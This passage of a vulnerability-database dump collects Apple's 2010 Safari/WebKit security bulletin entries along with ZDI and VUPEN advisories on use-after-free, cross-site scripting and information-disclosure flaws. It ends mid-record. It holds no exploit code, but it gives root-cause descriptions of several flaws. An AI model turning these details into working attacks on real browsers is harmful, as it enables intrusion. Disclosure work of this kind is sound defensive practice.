Mac OS X v10.6.2 or later, Mac OS X Server v10.6.2 or later, Windows 7, Vista, XP SP2 or later\r\n\r\n Impact: Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A use after free issue exists in WebKit's handling of SVG documents with multiple 'use' elements. Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved handling of 'use' elements in SVG documents. Credit to wushi of team509, working with TippingPoint's Zero Day Initiative for reporting this issue.\r\n\r\n *\r\n\r\n WebKit\r\n\r\n CVE-ID: CVE-2010-1410\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6.2 or later, Mac OS X Server v10.6.2 or later, Windows 7, Vista, XP SP2 or later\r\n\r\n Impact: Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A memory corruption issue exists in WebKit's handling of nested 'use' elements in SVG documents. Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved handling of nested 'use' elements in SVG documents. Credit to Aki Helin of OUSPG for reporting this issue.\r\n\r\n *\r\n\r\n WebKit\r\n\r\n CVE-ID: CVE-2010-1749\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6.2 or later, Mac OS X Server v10.6.2 or later, Windows 7, Vista, XP SP2 or later\r\n\r\n Impact: Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A use after free issue exists in WebKit's handling of CSS run-ins. Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved handling of CSS run-ins. Credit to wushi of team509, working with TippingPoint's Zero Day Initiative for reporting this issue.\r\n\r\n *\r\n\r\n WebKit\r\n\r\n CVE-ID: CVE-2010-1405\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6.2 or later, Mac OS X Server v10.6.2 or later, Windows 7, Vista, XP SP2 or later\r\n\r\n Impact: Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A use after free issue exists in WebKit's handling of HTML elements with custom vertical positioning. Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved memory reference tracking. Credit to Ojan Vafai of Google Inc. for reporting this issue.\r\n\r\n *\r\n\r\n WebKit\r\n\r\n CVE-ID: CVE-2010-1406\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6.2 or later, Mac OS X Server v10.6.2 or later, Windows 7, Vista, XP SP2 or later\r\n\r\n Impact: Visiting an HTTPS site which redirects to an HTTP site may lead to an information disclosure\r\n\r\n Description: When WebKit is redirected from an HTTPS site to an HTTP site, the Referer header is passed to the HTTP site. This can lead to the disclosure of sensitive information contained in the URL of the HTTPS site. This issue is addressed by not passing the Referer header when an HTTPS site redirects to an HTTP site. Credit to Colin Percival of Tarsnap for reporting this issue.\r\n\r\n *\r\n\r\n WebKit\r\n\r\n CVE-ID: CVE-2010-1408\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6.2 or later, Mac OS X Server v10.6.2 or later, Windows 7, Vista, XP SP2 or later\r\n\r\n Impact: Visiting a maliciously crafted website may result in sending remotely specified data to arbitrary TCP ports\r\n\r\n Description: An integer truncation issue exists in WebKit's handling of requests to non-default TCP ports. Visiting a maliciously crafted website may result in sending remotely specified data to arbitrary TCP ports. This issue is addressed by ensuring that port numbers are within the valid range.\r\n\r\n *\r\n\r\n WebKit\r\n\r\n CVE-ID: CVE-2010-1409\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6.2 or later, Mac OS X Server v10.6.2 or later, Windows 7, Vista, XP SP2 or later\r\n\r\n Impact: Visiting a maliciously crafted website may allow remotely specified data to be sent to an IRC server\r\n\r\n Description: Common IRC service ports are not included in WebKit's port blacklist. Visiting a maliciously crafted website may allow remotely specified data to be sent to an IRC server. This may cause the server to take unintended actions on the user's behalf. This issue is addressed by adding the affected ports to WebKit's port blacklist.\r\n\r\n *\r\n\r\n WebKit\r\n\r\n CVE-ID: CVE-2010-1412\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6.2 or later, Mac OS X Server v10.6.2 or later, Windows 7, Vista, XP SP2 or later\r\n\r\n Impact: Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A use after free issue exists in WebKit's handling of hover events. Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved handling of hover events. Credit to Dave Bowker of davebowker.com for reporting this issue.\r\n\r\n *\r\n\r\n WebKit\r\n\r\n CVE-ID: CVE-2010-1413\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6.2 or later, Mac OS X Server v10.6.2 or later, Windows 7, Vista, XP SP2 or later\r\n\r\n Impact: A user's NTLM credentials may be exposed to a man in the middle attacker\r\n\r\n Description: In certain circumstances, WebKit may send NTLM credentials in plain text. This would allow a man in the middle attacker to view the NTLM credentials. This issue is addressed through improved handling of NTLM credentials. Credit: Apple.\r\n\r\n *\r\n\r\n WebKit\r\n\r\n CVE-ID: CVE-2010-1414\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6.2 or later, Mac OS X Server v10.6.2 or later, Windows 7, Vista, XP SP2 or later\r\n\r\n Impact: Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A use after free issue exists in WebKit's handling of the removeChild DOM method. Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved handling of child element removal. Credit to Mark Dowd of Azimuth Security for reporting this issue.\r\n\r\n *\r\n\r\n WebKit\r\n\r\n CVE-ID: CVE-2010-1415\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6.2 or later, Mac OS X Server v10.6.2 or later, Windows 7, Vista, XP SP2 or later\r\n\r\n Impact: Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: An API abuse issue exists in WebKit's handling of libxml contexts. Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved handling of libxml context objects. Credit to Aki Helin of OUSPG for reporting this issue.\r\n\r\n *\r\n\r\n WebKit\r\n\r\n CVE-ID: CVE-2010-1416\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6.2 or later, Mac OS X Server v10.6.2 or later, Windows 7, Vista, XP SP2 or later\r\n\r\n Impact: Visiting a maliciously crafted website may disclose images from other sites\r\n\r\n Description: A cross-site image capture issue exists in WebKit. By using a canvas with an SVG image pattern, a maliciously crafted website may load and capture an image from another website. This issue is addressed by restricting the reading of canvases that contain patterns loaded from other websites. Credit to Chris Evans of Google Inc. for reporting this issue.\r\n\r\n *\r\n\r\n WebKit\r\n\r\n CVE-ID: CVE-2010-1417\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6.2 or later, Mac OS X Server v10.6.2 or later, Windows 7, Vista, XP SP2 or later\r\n\r\n Impact: Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A memory corruption issue exists in WebKit's rendering of CSS-styled HTML content with multiple :after pseudo-selectors. Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved rendering of HTML content. Credit to wushi of team509 for reporting this issue.\r\n\r\n *\r\n\r\n WebKit\r\n\r\n CVE-ID: CVE-2010-1418\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6.2 or later, Mac OS X Server v10.6.2 or later, Windows 7, Vista, XP SP2 or later\r\n\r\n Impact: Visiting a maliciously crafted website may lead to a cross-site scripting attack\r\n\r\n Description: An input validation issue exists in WebKit's handling of the src attribute of the frame element. An attribute with a javascript scheme and leading spaces is considered valid. Visiting a maliciously crafted website could lead to a cross-site scripting attack. This update addresses the issue by properly validating frame.src before the URL is dereferenced. Credit to Sergey Glazunov for reporting this issue.\r\n\r\n *\r\n\r\n WebKit\r\n\r\n CVE-ID: CVE-2010-1419\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6.2 or later, Mac OS X Server v10.6.2 or later, Windows 7, Vista, XP SP2 or later\r\n\r\n Impact: Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A use after free issue exists in WebKit's handling of drag and drop when the window acting as a source of a drag operation is closed before the drag operation is completed. Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved memory management. Credit to kuzzcc, and Skylined of Google Chrome Security Team for reporting this issue.\r\n\r\n *\r\n\r\n WebKit\r\n\r\n CVE-ID: CVE-2010-1421\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6.2 or later, Mac OS X Server v10.6.2 or later, Windows 7, Vista, XP SP2 or later\r\n\r\n Impact: Visiting a maliciously crafted website may change the contents of the clipboard\r\n\r\n Description: A design issue exists in the implementation of the JavaScript function execCommand. A maliciously crafted web page can modify the contents of the clipboard without user interaction. This issue is addressed by only allowing clipboard commands to be executed if initiated by the user. Credit: Apple.\r\n\r\n *\r\n\r\n WebKit\r\n\r\n CVE-ID: CVE-2010-0544\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6.2 or later, Mac OS X Server v10.6.2 or later, Windows 7, Vista, XP SP2 or later\r\n\r\n Impact: Visiting a maliciously crafted website may result in a cross-site scripting attack\r\n\r\n Description: An issue in Webkit's handling of malformed URLs may result in a cross-site scripting attack when visiting a maliciously crafted website. This issue is addressed through improved handling of URLs. Credit to Michal Zalewski of Google, Inc. for reporting this issue.\r\n\r\n *\r\n\r\n WebKit\r\n\r\n CVE-ID: CVE-2010-1758\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6.2 or later, Mac OS X Server v10.6.2 or later, Windows 7, Vista, XP SP2 or later\r\n\r\n Impact: Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A use after free issue exists in WebKit's handling of DOM Range objects. Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved handling of DOM Range objects. Credit to Yaar Schnitman of Google Inc. for reporting this issue.\r\n\r\n *\r\n\r\n WebKit\r\n\r\n CVE-ID: CVE-2010-1759\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6.2 or later, Mac OS X Server v10.6.2 or later, Windows 7, Vista, XP SP2 or later\r\n\r\n Impact: Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A use after free issue exists in WebKit's handling of the Node.normalize method. Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved handling of the Node.normalize method. Credit to Mark Dowd for reporting this issue.\r\n\r\n *\r\n\r\n WebKit\r\n\r\n CVE-ID: CVE-2010-1761\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6.2 or later, Mac OS X Server v10.6.2 or later, Windows 7, Vista, XP SP2 or later\r\n\r\n Impact: Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A use after free issue exists in WebKit's rendering of HTML document subtrees. Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved rendering of HTML document subtrees. Credit to James Robinson of Google Inc. for reporting this issue.\r\n\r\n *\r\n\r\n WebKit\r\n\r\n CVE-ID: CVE-2010-1762\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6.2 or later, Mac OS X Server v10.6.2 or later, Windows 7, Vista, XP SP2 or later\r\n\r\n Impact: Visiting a maliciously crafted website may lead to a cross-site scripting attack\r\n\r\n Description: A design issue exists in the handling of HTML contained in textarea elements. Visiting a maliciously crafted website may lead to a cross-site scripting attack. This issue is addressed through improved validation of textarea elements. Credit to Eduardo Vela Nava (sirdarckcat) of Google Inc. for reporting this issue.\r\n\r\n *\r\n\r\n WebKit\r\n\r\n CVE-ID: CVE-2010-1764\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6.2 or later, Mac OS X Server v10.6.2 or later, Windows 7, Vista, XP SP2 or later\r\n\r\n Impact: Visiting a website which redirects form submissions may lead to an information disclosure\r\n\r\n Description: A design issue exists in WebKit's handling of HTTP redirects. When a form submission is redirected to a website that also does a redirection, the information contained in the submitted form may be sent to the third site. This issue is addressed through improved handling of HTTP redirects. Credit to Marc Worrell of WhatWebWhat for reporting this issue.\r\n\r\n *\r\n\r\n WebKit\r\n\r\n CVE-ID: CVE-2010-1770\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6.2 or later, Mac OS X Server v10.6.2 or later, Windows 7, Vista, XP SP2 or later\r\n\r\n Impact: Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A type checking issue exists in WebKit's handling of text nodes. Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved type checking. Credit to wushi of team509, working with TippingPoint's Zero Day Initiative for reporting this issue.\r\n\r\n *\r\n\r\n WebKit\r\n\r\n CVE-ID: CVE-2010-1771\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6.2 or later, Mac OS X Server v10.6.2 or later, Windows 7, Vista, XP SP2 or later\r\n\r\n Impact: Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A use after free issue exists in WebKit's handling of fonts. Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved handing of fonts. Credit: Apple.\r\n\r\n *\r\n\r\n WebKit\r\n\r\n CVE-ID: CVE-2010-1774\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6.2 or later, Mac OS X Server v10.6.2 or later, Windows 7, Vista, XP SP2 or later\r\n\r\n Impact: Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: An out of bounds memory access issue exists in WebKit's handling of HTML tables. Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved bounds checking. Credit to wushi of team509 for reporting this issue.\r\n\r\n *\r\n\r\n WebKit\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6.2 or later, Mac OS X Server v10.6.2 or later, Windows 7, Vista, XP SP2 or later\r\n\r\n Impact: A maliciously crafted website may be able to determine which sites a user has visited\r\n\r\n Description: A design issue exists in WebKit's handling of the CSS :visited pseudo-class. A maliciously crafted website may be able to determine which sites a user has visited. This update limits the ability of web pages to style pages based on whether links are visited.\r\n\r\nAdditional Information\r\n\r\nNote: Safari 5.0 and Safari 4.1 address the same set of security issues. Safari 5.0 is provided for Mac OS X v10.5, Mac OS X v10.6, and Microsoft Windows systems. Safari 4.1 is provided for Mac OS X v10.4 systems.\r\n\r\nImportant: Information about products not manufactured by Apple is provided for information purposes only and does not constitute Apple\u2019s recommendation or endorsement. Please contact the vendor for additional information.", "edition": 1, "modified": "2010-06-08T00:00:00", "published": "2010-06-08T00:00:00", "id": "SECURITYVULNS:DOC:23999", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:23999", "title": "VUPEN Security Research - Apple Safari WebKit HTML Button Use-after-free Vulnerability (CVE-2010-1392)", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:37", "bulletinFamily": "software", "cvelist": ["CVE-2010-0544", "CVE-2010-1412", "CVE-2010-1397", "CVE-2010-1416", "CVE-2010-1396", "CVE-2010-1417", "CVE-2010-1409", "CVE-ID:CVE-2010-1389", "CVE-2010-1749", "CVE-2010-1758", "CVE-2010-1771", "CVE-2010-1410", "CVE-2010-1415", "CVE-2010-1419", "CVE-ID:CVE-2010-1388", "CVE-2010-1385", "CVE-ID:CVE-2010-1390", "CVE-2010-1759", "CVE-2009-1726", "CVE-2010-1384", "CVE-2010-1774", "CVE-2010-1395", "CVE-2010-1400", "CVE-2010-1406", "CVE-2010-1418", "CVE-2010-1119", "CVE-2010-1398", "CVE-2010-1401", "CVE-ID:CVE-2010-1391", "CVE-2010-1413", "CVE-2010-1408", "CVE-2010-1403", "CVE-2010-1761", "CVE-2010-1422", "CVE-2010-1393", "CVE-2010-1770", "CVE-2010-1392", "CVE-2010-1750", "CVE-2010-1402", "CVE-2010-1762", "CVE-2010-1764", "CVE-2010-1405", "CVE-2010-1414", "CVE-2010-1421", "CVE-2010-1394", "CVE-2010-1399"], "description": "Multiple memory corruptions, code execution.", "edition": 1, "modified": "2010-06-11T00:00:00", "published": "2010-06-11T00:00:00", "id": "SECURITYVULNS:VULN:10908", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:10908", "title": "Apple Webkit / Safari / Google Chrome multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:35", "bulletinFamily": "software", "cvelist": ["CVE-2010-1392"], "description": "VUPEN Security Research - Apple Safari WebKit HTML Button Use-after-free \r\nVulnerability (CVE-2010-1392)\r\n\r\nhttp://www.vupen.com/english/research.php\r\n\r\n\r\nI. BACKGROUND\r\n---------------------\r\n\r\n"Safari is a web browser developed by Apple. As of February 2010,\r\nSafari was the fourth most widely used browser, with 4.45% of the\r\nworldwide usage share of web browsers according to Net Application."\r\n\r\n\r\nII. DESCRIPTION\r\n---------------------\r\n\r\nVUPEN Vulnerability Research Team discovered a vulnerability in\r\nApple Safari for Windows, Mac OS X and iPhone.\r\n\r\nThe flaw is caused due to a use-after-free error in WebKit when\r\nrendering HTML buttons, which could be exploited by attackers to\r\nexecute arbitrary code via a specially crafted web page.\r\n\r\n\r\n\r\nIII. AFFECTED PRODUCTS\r\n---------------------------\r\n\r\nApple Safari version 4.0.5 and prior\r\n\r\n(Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5.8,\r\nMac OS X Server v10.5.8, Mac OS X v10.6.2 or later, Mac OS X Server\r\nv10.6.2 and later, Windows 7, Vista, XP SP2 and later, iPhone)\r\n\r\n\r\n\r\nIV. Binary Analysis & Proof-of-concept\r\n---------------------------------------\r\n\r\nIn-depth binary analysis of the vulnerability and a code execution exploit\r\nhave been published by VUPEN through the VUPEN Binary Analysis & Exploits\r\nportal :\r\n\r\nhttp://www.vupen.com/exploits/\r\n\r\n\r\nV. SOLUTION\r\n----------------\r\n\r\nUpgrade to Apple Safari version 5.0 or 4.1 :\r\nhttp://www.apple.com/safari/download/\r\n\r\n\r\nVI. CREDIT\r\n--------------\r\n\r\nThe vulnerability was discovered by Matthieu Bonetti of VUPEN Security\r\n\r\n\r\nVII. ABOUT VUPEN Security\r\n---------------------------\r\n\r\nVUPEN is a leading IT security research company providing vulnerability\r\nmanagement and security intelligence solutions which enable enterprises\r\nand institutions to eliminate vulnerabilities before they can be exploited,\r\nensure security policy compliance and meaningfully measure and manage risks.\r\n\r\nGovernmental and federal agencies, and global enterprises in the financial\r\nservices, insurance, manufacturing and technology industries rely on VUPEN\r\nto improve their security, prioritize resources, cut time and costs, and\r\nstay ahead of the latest threats.\r\n\r\n* VUPEN Vulnerability Notification Service:\r\nhttp://www.vupen.com/english/services/\r\n\r\n* VUPEN Binary Analysis & Exploits Service :\r\nhttp://www.vupen.com/exploits/\r\n\r\n* VUPEN Web Application Security Scanner (WASS):\r\nhttp://www.vupen.com/english/wass/\r\n\r\n\r\nVIII. REFERENCES\r\n----------------------\r\n\r\nhttp://www.vupen.com/english/advisories/2010/1373\r\nhttp://support.apple.com/kb/HT4196\r\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1392\r\n\r\n\r\nIX. DISCLOSURE TIMELINE\r\n-----------------------------\r\n\r\n2010-03-30 - Vendor notified\r\n2010-03-30 - Vendor response\r\n2010-05-07 - Status update received\r\n2010-06-02 - Status update received\r\n2010-06-08 - Coordinated public Disclosure", "edition": 1, "modified": "2010-06-08T00:00:00", "published": "2010-06-08T00:00:00", "id": "SECURITYVULNS:DOC:23998", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:23998", "title": "VUPEN Security Research - Apple Safari WebKit HTML Button Use-after-free Vulnerability (CVE-2010-1392)", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:35", "bulletinFamily": "software", "cvelist": ["CVE-2010-1404"], "description": "ZDI-10-096: Apple Webkit Recursive Use Element Remote Code Execution Vulnerability\r\nhttp://www.zerodayinitiative.com/advisories/ZDI-10-096\r\nJune 8, 2010\r\n\r\n-- CVE ID:\r\nCVE-2010-1404\r\n\r\n-- Affected Vendors:\r\nApple\r\n\r\n-- Affected Products:\r\nApple WebKit\r\n\r\n-- TippingPoint(TM) IPS Customer Protection:\r\nTippingPoint IPS customers have been protected against this\r\nvulnerability by Digital Vaccine protection filter ID 9849. \r\nFor further product information on the TippingPoint IPS, visit:\r\n\r\n http://www.tippingpoint.com\r\n\r\n-- Vulnerability Details:\r\nThis vulnerability allows remote attackers to execute arbitrary code on\r\nvulnerable installations of Apple's Webkit. User interaction is required\r\nto exploit this vulnerability in that the target must visit a malicious\r\npage or open a malicious file.\r\n\r\nThe specific flaw exists within how the WebKit library handles\r\nrecursively defined Use elements. Upon expanding the target of the use\r\nelement within the tree, the application will create a dual-reference of\r\na Use element. Upon page deconstruction the application will destroy the\r\nsingle reference and then attempt to destroy the second one that is\r\ncurrently occupying the recently freed memory. Successful exploitation\r\ncan lead to code execution under the context of the application.\r\n\r\n-- Vendor Response:\r\nApple has issued an update to correct this vulnerability. More\r\ndetails can be found at:\r\n\r\nhttp://support.apple.com/kb/HT4196\r\n\r\n-- Disclosure Timeline:\r\n2010-02-23 - Vulnerability reported to vendor\r\n2010-06-08 - Coordinated public release of advisory\r\n\r\n-- Credit:\r\nThis vulnerability was discovered by:\r\n * wushi of team509\r\n\r\n-- About the Zero Day Initiative (ZDI):\r\nEstablished by TippingPoint, The Zero Day Initiative (ZDI) represents \r\na best-of-breed model for rewarding security researchers for responsibly\r\ndisclosing discovered vulnerabilities.\r\n\r\nResearchers interested in getting paid for their security research\r\nthrough the ZDI can find more information and sign-up at:\r\n\r\n http://www.zerodayinitiative.com\r\n\r\nThe ZDI is unique in how the acquired vulnerability information is\r\nused. TippingPoint does not re-sell the vulnerability details or any\r\nexploit code. Instead, upon notifying the affected product vendor,\r\nTippingPoint provides its customers with zero day protection through\r\nits intrusion prevention technology. Explicit details regarding the\r\nspecifics of the vulnerability are not exposed to any parties until\r\nan official vendor patch is publicly available. Furthermore, with the\r\naltruistic aim of helping to secure a broader user base, TippingPoint\r\nprovides this vulnerability information confidentially to security\r\nvendors (including competitors) who have a vulnerability protection or\r\nmitigation product.\r\n\r\nOur vulnerability disclosure policy is available online at:\r\n\r\n http://www.zerodayinitiative.com/advisories/disclosure_policy/\r\n\r\nFollow the ZDI on Twitter:\r\n\r\n http://twitter.com/thezdi", "edition": 1, "modified": "2010-06-08T00:00:00", "published": "2010-06-08T00:00:00", "id": "SECURITYVULNS:DOC:24003", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:24003", "title": "ZDI-10-096: Apple Webkit Recursive Use Element Remote Code Execution Vulnerability", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:35", "bulletinFamily": "software", "cvelist": ["CVE-2010-1403"], "description": "ZDI-10-099: Apple Webkit ProcessInstruction Target Error Message Insertion Remote Code Execution\r\nVulnerability\r\nhttp://www.zerodayinitiative.com/advisories/ZDI-10-099\r\nJune 8, 2010\r\n\r\n-- CVE ID:\r\nCVE-2010-1403\r\n\r\n-- Affected Vendors:\r\nApple\r\n\r\n-- Affected Products:\r\nApple WebKit\r\n\r\n-- TippingPoint(TM) IPS Customer Protection:\r\nTippingPoint IPS customers have been protected against this\r\nvulnerability by Digital Vaccine protection filter ID 9872. \r\nFor further product information on the TippingPoint IPS, visit:\r\n\r\n http://www.tippingpoint.com\r\n\r\n-- Vulnerability Details:\r\nThis vulnerability allows remote attackers to execute arbitrary code on\r\nvulnerable installations of Apple's Webkit. User interaction is required\r\nto exploit this vulnerability in that the target must visit a malicious\r\npage or open a malicious file.\r\n\r\nThe specific flaw exists with how WebKit inserts error messages into\r\ndocuments utilizing the SVG namespace. Upon a parsing error the library\r\nwill attempt to access an element before repairing the XML. This will\r\ncause the library to access uninitialized memory which can lead to code\r\nexecution under the context of the application.\r\n\r\n-- Vendor Response:\r\nApple has issued an update to correct this vulnerability. More\r\ndetails can be found at:\r\n\r\nhttp://support.apple.com/kb/HT1222\r\n\r\n-- Disclosure Timeline:\r\n2010-02-23 - Vulnerability reported to vendor\r\n2010-06-08 - Coordinated public release of advisory\r\n\r\n-- Credit:\r\nThis vulnerability was discovered by:\r\n * wushi of team509\r\n\r\n-- About the Zero Day Initiative (ZDI):\r\nEstablished by TippingPoint, The Zero Day Initiative (ZDI) represents \r\na best-of-breed model for rewarding security researchers for responsibly\r\ndisclosing discovered vulnerabilities.\r\n\r\nResearchers interested in getting paid for their security research\r\nthrough the ZDI can find more information and sign-up at:\r\n\r\n http://www.zerodayinitiative.com\r\n\r\nThe ZDI is unique in how the acquired vulnerability information is\r\nused. TippingPoint does not re-sell the vulnerability details or any\r\nexploit code. Instead, upon notifying the affected product vendor,\r\nTippingPoint provides its customers with zero day protection through\r\nits intrusion prevention technology. Explicit details regarding the\r\nspecifics of the vulnerability are not exposed to any parties until\r\nan official vendor patch is publicly available. Furthermore, with the\r\naltruistic aim of helping to secure a broader user base, TippingPoint\r\nprovides this vulnerability information confidentially to security\r\nvendors (including competitors) who have a vulnerability protection or\r\nmitigation product.\r\n\r\nOur vulnerability disclosure policy is available online at:\r\n\r\n http://www.zerodayinitiative.com/advisories/disclosure_policy/\r\n\r\nFollow the ZDI on Twitter:\r\n\r\n http://twitter.com/thezdi", "edition": 1, "modified": "2010-06-08T00:00:00", "published": "2010-06-08T00:00:00", "id": "SECURITYVULNS:DOC:24005", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:24005", "title": "ZDI-10-099: Apple Webkit ProcessInstruction Target Error Message Insertion Remote Code Execution Vulnerability", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2020-03-03T21:01:28", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0544", "CVE-2010-1412", "CVE-2010-1397", "CVE-2010-1416", "CVE-2010-1396", "CVE-2010-1417", "CVE-2010-1409", "CVE-2010-1749", "CVE-2010-1758", "CVE-2010-1771", "CVE-2010-1410", "CVE-2010-1415", "CVE-2010-1419", "CVE-2010-1389", "CVE-2010-1391", "CVE-2010-1385", "CVE-2010-1759", "CVE-2010-1384", "CVE-2010-1774", "CVE-2010-1395", "CVE-2010-1400", "CVE-2010-2264", "CVE-2010-1406", "CVE-2010-1418", "CVE-2010-1398", "CVE-2010-1401", "CVE-2010-1413", "CVE-2010-1408", "CVE-2010-1403", "CVE-2010-1404", "CVE-2010-1761", "CVE-2010-1422", "CVE-2010-1390", "CVE-2010-1393", "CVE-2010-1770", "CVE-2010-1392", "CVE-2010-1750", "CVE-2010-1402", "CVE-2010-1762", "CVE-2010-1764", "CVE-2010-1405", "CVE-2010-1414", "CVE-2010-1421", 